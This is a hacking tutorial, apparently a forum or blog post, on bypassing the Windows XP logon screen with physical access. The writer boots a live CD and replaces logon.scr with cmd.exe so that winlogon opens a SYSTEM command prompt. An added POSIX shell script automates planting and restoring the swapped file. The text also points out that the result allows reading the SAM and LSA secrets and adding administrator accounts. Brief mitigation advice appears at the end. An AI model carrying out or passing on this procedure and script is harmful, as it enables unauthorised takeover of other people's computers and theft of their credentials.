Tutorial: bypassing logon screen
In this tutorial I'll give you some insight into hacking your way into Windows. In Windows XP (and the other NT-based releases of its era), you are presented with a logon screen at boot. If nobody touches the mouse or keyboard for the configured timeout (600 seconds, i.e. 10 minutes, by default, set by ScreenSaveTimeOut under HKEY_USERS\.DEFAULT\Control Panel\Desktop), winlogon.exe launches the logon screensaver on its own desktop. It is winlogon, not the kernel, that does this, and since winlogon runs as LocalSystem, so does whatever it launches. Knowing this, we can use that code execution path to gain SYSTEM privileges if we can trick Windows into running our code in place of the screensaver. The preconditions are physical access, the ability to boot from removable media, and a system volume that is not encrypted.
The way I did this is actually quite trivial: boot into an environment that gives direct access to the filesystem (in my case a slightly modified version of Knoppix with NTFS write support) and tamper with the logon screensaver. In Windows XP this file is %SYSTEMROOT%\System32\logon.scr. I replaced it with a copy of cmd.exe, then synced the disk and unmounted it. Keep a copy of the original logon.scr somewhere, because you will want to put the machine back the way you found it afterwards.
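As an added example (my script, not the author's), here is the offline swap described above as a small POSIX shell script to run from the live CD once the NTFS volume is mounted read-write. The mount point used in the usage comment (/mnt/win) and the backup name logon.scr.orig are my assumptions, the file names are assumed to be lowercase on disk as they are on a stock XP install, and the mount command itself depends on which NTFS driver the CD ships, so it is left out.

```shell
#!/bin/sh
# Added example, not the tutorial author's script: swap logon.scr for cmd.exe
# on an offline NTFS volume already mounted read-write at "$1". The mount step
# (driver-specific on the live CD) is deliberately not part of this script.
set -eu

# NTFS is case-insensitive, Linux is not: locate System32 whatever its case
# (WINDOWS on XP, WINNT on 2000) so the caller never has to guess the spelling.
find_system32() {
    find "$1" -maxdepth 2 -type d -ipath '*/win*/system32' | head -n 1
}

# Replace logon.scr with a copy of cmd.exe, keeping the original as
# logon.scr.orig (assumed backup name). A second run does not overwrite an
# existing backup with the already-trojaned copy.
plant_trojan() {
    sys32=$(find_system32 "$1")
    [ -n "$sys32" ] || { echo "System32 not found under $1" >&2; return 1; }
    [ -f "$sys32/cmd.exe" ] && [ -f "$sys32/logon.scr" ] || {
        echo "cmd.exe or logon.scr missing in $sys32" >&2; return 1; }
    [ -f "$sys32/logon.scr.orig" ] || cp -p "$sys32/logon.scr" "$sys32/logon.scr.orig"
    cp -p "$sys32/cmd.exe" "$sys32/logon.scr"
    sync    # flush to disk before the CD is ejected and the box rebooted
}

# Put the real screensaver back once you are done with the machine.
restore_original() {
    sys32=$(find_system32 "$1")
    [ -n "$sys32" ] && [ -f "$sys32/logon.scr.orig" ] || return 1
    mv "$sys32/logon.scr.orig" "$sys32/logon.scr"
    sync
}

# Usage from the live CD, with the volume mounted at /mnt/win (assumed path):
#   plant_trojan /mnt/win && umount /mnt/win
#   ... reboot, wait for the screensaver, do your work, boot the CD again ...
#   restore_original /mnt/win && umount /mnt/win
```

The sync before unmounting matters: the swap is useless if the new logon.scr is still sitting in the page cache when you eject the CD and hit reset.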
Once my "Trojan" was in place, I ejected my boot CD, rebooted the machine and waited. Windows XP booted up to its logon screen, waiting for me to enter my credentials. But I didn't. I just sat there, enjoying a coffee, documenting my procedures to this point. About 15 minutes later, Windows XP launched my version of the logon screensaver, giving me a command prompt. But not just ANY command prompt: a command prompt with SYSTEM privileges. For those of you that do not know, LocalSystem is at least as powerful as a local Administrator, and on the local machine more so: it can read the SAM and the LSA secrets, and it can add any account to the Administrators group. I'm in. Now, simply type "explorer" and watch a full SYSTEM desktop come up over the logon screen. The fix is not something you patch in Windows: lock the boot order behind a firmware password, encrypt the system volume, and, if you do not need the logon screensaver at all, disable it by setting ScreenSaveActive to 0 under HKEY_USERS\.DEFAULT\Control Panel\Desktop.